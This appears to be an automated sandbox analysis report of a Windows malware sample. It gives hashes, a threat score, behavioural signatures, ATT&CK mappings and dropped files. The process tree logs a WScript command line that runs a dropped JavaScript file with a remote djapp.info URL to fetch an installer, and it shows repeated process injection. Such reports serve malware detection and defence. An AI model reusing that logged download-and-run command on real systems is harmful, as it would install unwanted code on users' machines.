ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053

General

Target

ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe
Size

184KB
MD5

84bfc8bcd738871f997f9aa4a61da090
SHA1

6ae619e0cac6aad0bf42ba104146166b61960cdc
SHA256

ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053
SHA512

14cb2fa3ff029591c779250871fc7ddf5ccda39754493acc72052309b665d1755b8bed32b18d0e8409f164cea3f8fac312f50f4ddf32a55c9bfcba9cf35db8b3
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3p:/7BSH8zUB+nGESaaRvoB7FJNndnk

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	1584	WScript.exe
5	1584	WScript.exe
7	1380	WScript.exe
9	1380	WScript.exe
10	1828	WScript.exe
12	1828	WScript.exe
13	1324	WScript.exe
15	1324	WScript.exe
16	1876	WScript.exe
18	1876	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1428 wrote to memory of 1584	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	28
PID 1428 wrote to memory of 1584	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	28
PID 1428 wrote to memory of 1584	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	28
PID 1428 wrote to memory of 1584	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	28
PID 1428 wrote to memory of 1380	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	31
PID 1428 wrote to memory of 1380	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	31
PID 1428 wrote to memory of 1380	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	31
PID 1428 wrote to memory of 1380	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	31
PID 1428 wrote to memory of 1828	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	33
PID 1428 wrote to memory of 1828	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	33
PID 1428 wrote to memory of 1828	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	33
PID 1428 wrote to memory of 1828	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	33
PID 1428 wrote to memory of 1324	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	34
PID 1428 wrote to memory of 1324	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	34
PID 1428 wrote to memory of 1324	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	34
PID 1428 wrote to memory of 1324	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	34
PID 1428 wrote to memory of 1876	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	35
PID 1428 wrote to memory of 1876	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	35
PID 1428 wrote to memory of 1876	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	35
PID 1428 wrote to memory of 1876	1428	ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe	35

C:\Users\Admin\AppData\Local\Temp\ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe
"C:\Users\Admin\AppData\Local\Temp\ab5f3daec37c307e4d002d7063d0423187c07e88f7c994984a96f4f5a7cac053.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1428
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf54C5.js" http://www.djapp.info/?domain=gSaPqknhyo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf54C5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1584
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf54C5.js" http://www.djapp.info/?domain=gSaPqknhyo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf54C5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1380
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf54C5.js" http://www.djapp.info/?domain=gSaPqknhyo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf54C5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1828
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf54C5.js" http://www.djapp.info/?domain=gSaPqknhyo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf54C5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1324
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf54C5.js" http://www.djapp.info/?domain=gSaPqknhyo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf54C5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1876

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf54C5.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7EO8B5D4.txt

Filesize
100B

MD5
c88c45b6f22ac6557cb23324db906b1b

SHA1
1a07cce954ffcfc9d5c4f1f271b739f37206a2b4

SHA256
f636655f31de4dc310ee2998fd4ba85dcb22493890191e3e6ec0687a634893f6

SHA512
e61f500a80ca3844e0d6571f4d1a13f3d973584d62732e0c8587445ba3140cdd1914a0e1446be4372d15ff370d0e0cc28698c4158afcbbe6ecceb19305116db0

Download Submit
memory/1324-63-0x0000000000000000-mapping.dmp

Download
memory/1380-58-0x0000000000000000-mapping.dmp

Download
memory/1428-54-0x0000000076261000-0x0000000076263000-memory.dmp

Filesize
8KB

Download
memory/1584-55-0x0000000000000000-mapping.dmp

Download
memory/1828-61-0x0000000000000000-mapping.dmp

Download
memory/1876-65-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing